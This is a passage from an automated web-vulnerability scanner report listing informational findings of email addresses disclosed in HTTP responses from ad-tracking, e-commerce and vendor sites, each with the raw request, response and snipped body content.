* $Rev: 164 $
* $Date:: 2010-05-01 #$
* $Build: 35 (2010-05-01)
*
* Depends:
*    jquery.ui.core.js
*    jquery.
...[SNIP]...

26.41. http://stats.adbrite.com/stats/stats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.adbrite.com
Path:   /stats/stats.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /stats/stats.gif?_uid=218171&_pid=7013 HTTP/1.1
Host: stats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=5926853162236.512?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 25-Apr-2011 20:44:37 GMT
Set-Cookie: cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83TSozqDFNLbEyLLQwLkyxMrQyUKoFAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 21-Apr-2021 20:44:37 GMT
Set-Cookie: vsd=0@1@4db48bb5@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Tue, 26-Apr-2011 20:44:37 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 24 Apr 2011 20:44:37 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

26.42. http://stats.adbrite.com/stats/stats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.adbrite.com
Path:   /stats/stats.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /stats/stats.gif?_uid=218171&_pid=7013 HTTP/1.1
Host: stats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=3016771930269.897?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83TSpNqjFNLbEyLLQwLkyxMrQyUKoFAA%3D%3D"; srh="1%3Aq64FAA%3D%3D"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUiosNK4qrzEstDAuTK8xrDHQKTYqLjKsMSyoTMvLq0msMTQsqVLSUUpKzMtLLcoEa1GqrQUA"; vsd=0@1@4db48bb8@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: image/gif
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKnSKSw0riqvMSy0MC5MrzGsMVDSUUpKzMtLLcoEa1GqrQUA"; path=/; domain=.adbrite.com; expires=Wed, 21-Apr-2021 20:45:21 GMT
Set-Cookie: cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83TSpNqjFNLbEyLLQwLsqxMrKqNMxXqgUA"; path=/; domain=.adbrite.com; expires=Wed, 21-Apr-2021 20:45:21 GMT
Set-Cookie: vsd=0@2@4db48be1@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Tue, 26-Apr-2011 20:45:21 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 24 Apr 2011 20:45:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

26.43. http://stats.adbrite.com/stats/stats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.adbrite.com
Path:   /stats/stats.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /stats/stats.gif?_uid=218171&_pid=7013 HTTP/1.1
Host: stats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=764562517870.2175?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; srh="1%3Aq64FAA%3D%3D"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83TSpNqjFNLbEyLLQwLsq0MrIqK6hQqgUA"; ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZFtFlK668asQYmeZlJyrSil2cmpVmmCwRKYo%2Bz%2FwRgf"; vsd=0@2@4db48be1@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: image/gif
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 24-Jul-2011 00:56:55 GMT
Set-Cookie: ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZGSa0UpzU5OtUqTyTYLKd11Y9agRE%2BDwRKYo%2Bz%2FwRgf"; path=/; domain=.adbrite.com; expires=Thu, 22-Apr-2021 00:56:55 GMT
Set-Cookie: cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLS8wLc7KqzFNLbEyLLRISy2zMrayNEgvyVaqBQA%3D"; path=/; domain=.adbrite.com; expires=Thu, 22-Apr-2021 00:56:55 GMT
Set-Cookie: vsd=0@1@4db4c6d7@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 27-Apr-2011 00:56:55 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 25 Apr 2011 00:56:55 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

26.44. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/PagesShared/Include/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/PagesShared/Include/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /onlineshop/PagesShared/Include/s_code.js HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:51:14 GMT
Cache-Control: max-age=18000
Last-Modified: Mon, 28 Mar 2011 09:12:40 GMT
Accept-Ranges: bytes
ETag: "b478a64928edcb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 38698

... /* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
var s = s_gi(s_account)
/*************************
...[SNIP]...
@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+ "s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+ "X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;
...[SNIP]...

26.45. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Scripts/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /onlineshop/Scripts/jquery.cookie.js HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:51:13 GMT
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:00 GMT
Accept-Ranges: bytes
ETag: "c658fa264ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 4246

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

26.46. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.plugin.1.0.3.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Scripts/jquery.plugin.1.0.3.js

Issue detail

The following email address was disclosed in the response:

Request

GET /onlineshop/Scripts/jquery.plugin.1.0.3.js HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:51:13 GMT
Cache-Control: max-age=18000
Last-Modified: Mon, 28 Mar 2011 12:41:03 GMT
Accept-Ranges: bytes
ETag: "e4618a6645edcb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 2977

/*
*jQuery browser plugin detection 1.0.3
* http://plugins.jquery.com/project/jqplugin
* Checks for plugins / mimetypes supported in the browser extending the jQuery.browser object
* Copyright (c) 2008 Leonardo Rossetti motw.leo@gmail.com
* MIT License: http://www.opensource.org/licenses/mit-license.php
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANT
...[SNIP]...

26.47. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/documents/content/products/telefone/sortimentsprospekt/Leistungsmerkmale_Zusatzdienste_0810_de.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/documents/content/products/telefone/sortimentsprospekt/Leistungsmerkmale_Zusatzdienste_0810_de.pdf

Issue detail

The following email addresses were disclosed in the response:

Request

GET /onlineshop/documents/content/products/telefone/sortimentsprospekt/Leistungsmerkmale_Zusatzdienste_0810_de.pdf HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/documents/content/products/telefone/sortimentsprospekt/Leistungsmerkmale_Zusatzdienste_0810_de.pdf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671327284-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=%5B%5BB%5D%5D
Range: bytes=0-32767

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:55:40 GMT
Cache-Control: max-age=18000
Last-Modified: Fri, 13 Aug 2010 06:51:15 GMT
Accept-Ranges: bytes
ETag: "e1dd8fecb33acb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/pdf
Connection: close
Content-Length: 4533002

%PDF-1.4%....
320 0 obj<</Linearized 1/L 4533002/O 322/E 422442/N 26/T 4526486/H [ 1036 939]>>endobj xref320 370000000016 00000 n
0000001975 00000 n
0000002077 00000 n
0000002661 0
...[SNIP]...
<rdf:li xml:lang="x-default">foto@casparmartig.ch</rdf:li>
...[SNIP]...
<rdf:li xml:lang="x-default">foto@casparmartig.ch</rdf:li>
...[SNIP]...
<rdf:li>christian.grossenbacher@repromedia.ch</rdf:li>
...[SNIP]...
</Author(christian.grossenbacher@repromedia.ch)/CreationDate(D:20100810142457+02'00')/Creator(Adobe InDesign CS4 \(6.0.5\))/ModDate(D:20100810142558+02'00')/Producer(Adobe PDF Library 9.0)/Trapped/False>
...[SNIP]...

26.48. http://translate.googleapis.com/translate_a/t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The following email addresses were disclosed in the response:

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://sensic.net/
Origin: http://sensic.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 5421

q=%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20Sie%20haben%20jederzeit%20die%20M%C3%B6glichkeit%20die%20Erfassung%20von%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20statistischen%20Daten%20durch%20nura
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:34:32 GMT
Expires: Sun, 24 Apr 2011 20:34:32 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=ecc2baf5b500b4e0:TM=1303677271:LM=1303677272:S=nkt2FZkQr-H8Iirn; expires=Tue, 23-Apr-2013 20:34:32 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 4508

["\n \x3ci\x3eSie haben jederzeit die M..glichkeit die Erfassung von statistischen Daten durch nurago zu unterbinden.\x3c/i\x3e \x3cb\x3eYou always have the option of collecting statistic
...[SNIP]...
contact with further questions?","\x3ca i=0\x3eFor further questions about privacy, data collection and processing, and to opt-out cookie, please contact our Privacy Officer at the\x3c/a\x3e \x3ca i=1\x3edatenschutz@nurago.com\x3c/a\x3e \x3ca i=2\x3eavailable.\x3c/a\x3e","Note about your legal rights:","\x3ci\x3eSie erhalten jederzeit ohne Angabe von Gr..nden kostenfrei Auskunft ..ber Ihre bei uns gespeicherten Daten.\x3c/i
...[SNIP]...
always given us separately if consent to the collection and use without giving reasons withdraw.\x3c/a\x3e\x3c/b\x3e \x3ci\x3eWenden Sie sich hierzu bitte an die oben angegebene Kontaktadresse oder an datenschutz@nurago.com .\x3c/i\x3e \x3cb\x3e\x3ca i=0\x3eTo do so, please contact the above contact address or\x3c/a\x3e \x3ca i=1\x3edatenschutz@nurago.com\x3c/a\x3e \x3ca i=2\x3e.\x3c/a\x3e\x3c/b\x3e \x3ci\x3eWir stehen Ihnen jederzeit gern f..r weitergehende Fragen zu unserem Hinweisen zum Datenschutz und zur Verarbeitung Ihrer pers..nlichen Daten zur
...[SNIP]...
research technologies","\n\t\t\t\tKurt-Schumacher-Str. 24\n\t\t\t\t","30159 Hannover","\n\t\t\t\t.. 2011 nurago","T +49 511640997-0","\n\t\t\t\tF +49 511640997-22","\x3ca i=0\x3eE\x3c/a\x3e \x3ca i=1\x3enurago@nurago.com\x3c/a\x3e","Member of","nurago: Privacy Policy"]

26.49. https://vault.krypt.com/js/jquery.sprintf.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vault.krypt.com
Path:   /js/jquery.sprintf.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/jquery.sprintf.js?1290631147 HTTP/1.1
Host: vault.krypt.com
Connection: keep-alive
Referer: https://vault.krypt.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cid=9b766d29f4a59d55b1ee0c2aaaa06184; UBERSID=5tmog719be1801lsop4imj2so6; __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:08 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 21 Oct 2009 21:08:44 GMT
ETag: "8e06b8-24b5-476786249cf00"
Accept-Ranges: bytes
Content-Length: 9397
Connection: close
Content-Type: application/x-javascript

/*##############################################################################
# ____________________________________________________________________
# /
...[SNIP]...
|
# | |
# | www.mindstep.com www.mjslib.com |
# | info-oss@mindstep.com mjslib@mjslib.com |
# \____________________________________________________________________/
#
# Version: 1.0.0
#
# (Svn version: $Id: jquery.printf.js 3434 2007-08-27 09:31:20Z herve $)
#
#----------[This
...[SNIP]...

26.50. http://w.sharethis.com/button/buttons.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /button/buttons.js

Issue detail

The following email address was disclosed in the response:

Request

GET /button/buttons.js HTTP/1.1
Host: w.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.identitymanagement.com/?_kk=identity%20management&_kt=d37d8c67-315a-4919-abfc-41011051bd9e&gclid=CJvKs4D1tagCFeJ95Qodoi78Dg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1
If-None-Match: "2e0f6-95ac-4a0d0cfdf4400"
If-Modified-Since: Wed, 13 Apr 2011 18:16:48 GMT

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 20 Apr 2011 00:44:30 GMT
ETag: "2a0f5-97fe-4a14eed717780"
Accept-Ranges: bytes
Content-Type: application/javascript
Date: Sun, 24 Apr 2011 19:44:02 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 38910

var cookie=new function(){return{setCookie:function(d,f,h){if(h){var c=new Date();c.setTime(c.getTime()+(h*24*60*60*1000));var a="; expires="+c.toGMTString()}else{var a=""}var b=d+"="+escape(f)+a;var
...[SNIP]...
lse};stLight.onReady=function(){stLight.readyRun=true;if(stLight.publisher==null){if(typeof(window.console)!=="undefined"){try{console.log("Please specify a ShareThis Publisher Key \nFor help, contact support@sharethis.com")}catch(a){}}}var b="share4x";if(switchTo5x){b="share5x"}if(stLight.hasButtonOnPage()){if(stLight.loadedFromBar){if(switchTo5x){b="bar_share5x"}else{b="bar_share4x"}}}else{if(stLight.loadedFromBar){b=
...[SNIP]...

26.51. http://www.actividentity.com/support/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /support/

Issue detail

The following email address was disclosed in the response:

Request

GET /support/ HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303674298.1; __utmc=262184092; PHPSESSID=2knt766ulmukoda54fr91gtu97

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:43:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href='mailto:info@actividentity.com'>
...[SNIP]...

26.52. http://www.arcsight.com/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arcsight.com
Path:   /blog/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /blog/ HTTP/1.1
Host: www.arcsight.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=988332257; __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596; exp_last_activity=1303692408; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A1%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; __utmb=226624333

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:14:02 GMT
Server: Apache
Set-Cookie: exp_last_activity=1303694042; expires=Mon, 23-Apr-2012 20:14:02 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 20:14:02 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 36869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<link rel="alternate" type="application/rss+xml" href="http://feeds.feedburner
...[SNIP]...
<a href="mailto:website@arcsight.com">
...[SNIP]...
<a href="mailto:ArcSight-info@hp.com">ArcSight-info@hp.com</a>
...[SNIP]...

26.53. http://www.arcsight.com/products/products-esm/arcsight-express/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arcsight.com
Path:   /products/products-esm/arcsight-express/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /products/products-esm/arcsight-express/ HTTP/1.1
Host: www.arcsight.com
Proxy-Connection: keep-alive
Referer: http://www.arcsight.com/products/products-identity/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
